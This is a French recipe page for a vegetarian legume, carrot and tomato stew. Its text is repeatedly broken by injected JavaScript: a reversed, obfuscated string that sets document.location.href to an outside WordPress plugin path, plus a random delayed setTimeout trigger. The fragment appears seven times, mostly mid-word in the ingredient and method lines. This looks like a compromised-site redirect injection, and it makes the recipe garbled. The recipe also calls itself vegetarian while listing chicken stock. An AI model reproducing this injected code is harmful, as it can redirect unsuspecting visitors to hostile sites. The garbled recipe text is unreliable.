
LÉGUMINEUSES EN FOLIE (la recette végétarienne)
Pour 4 Pers.
INGRÉDIENTS
– 250g de légumineuses (il existe des mélanges au rayon bio de votre supermarché habituel: haricots rouges, lentilles vertes, lentilles corail, pois chiches, etc…toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout est bon)
– 2 carottes épluchées et taillées en petits dés
– 1 boîte de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates concassées
– Concentré de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate 1 CS
– 500 ml de bouillon de volaille
– 1 oignon émincé
– 2 gousses d’ail émincées
– Curcuma 1 CC
– Paprika 1 CC
– Piment doux ou fort selon les goûts 1 CC
– Coriandre hachée 1 CS
– Crème de soja 2 CS
– Huile d’olive 1 CS
– sel & poivre du Moulin
Faire tremper les légumineuses toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute une nuit dans de l’eau, au réfrigérateur.
Dans une grande casserole, faire revenir l’ail et l’oignon avec 1 CS d’huile d’olive et le concentré de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate pendant 2 minutes
Ajouter les légumineuses égouttées et cuire 2 minutes de plus en remuant.
Ajouter les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates, le bouillon et les épices.
Couvrir et laissez cuire 45 minutes environ à feu doux (bien surveiller la cuisson pour que les légumineuses n’attachent pas au fond de la casserole. Rajouter du bouillon si besoin).
Servir dans des bols ou des assiettes creuses. Parsemer de coriandre et de crème de soja
Bon appétit !
Le petit mot de Joanne : Attention: il ne faut saler qu’à la fin de la cuisson. Le sel empêche les légumineuses de devenir tendre !